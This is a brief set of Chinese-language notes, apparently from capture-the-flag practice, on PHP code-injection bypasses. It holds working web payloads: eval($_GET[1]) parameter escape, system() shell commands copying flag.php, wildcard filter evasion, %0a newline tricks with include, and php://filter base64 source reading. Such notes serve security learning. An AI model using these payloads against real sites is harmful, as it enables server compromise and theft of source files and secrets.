分号

?c=phpinfo; 可等同于 ?c=phpinfo?>
因为php最后一条语句 可以没有分号

shell命令

system("cp flag.php 1.txt"); 可以复制一个flag的内容到txt文档中
简单的过滤 可以使用 ? 占位符 来代替 比如fla?.php

逃逸 伪协议

?c=eval($_GET[1]);&1=1=system('cat flag.php');
这里的1是逃逸出来的字符 可以不被检测过滤
?c=include%0a$_GET[1];&1=
该文件包含的可配合读写使用

php://filter/read=convert.base64-encode/resource=

0a是换行符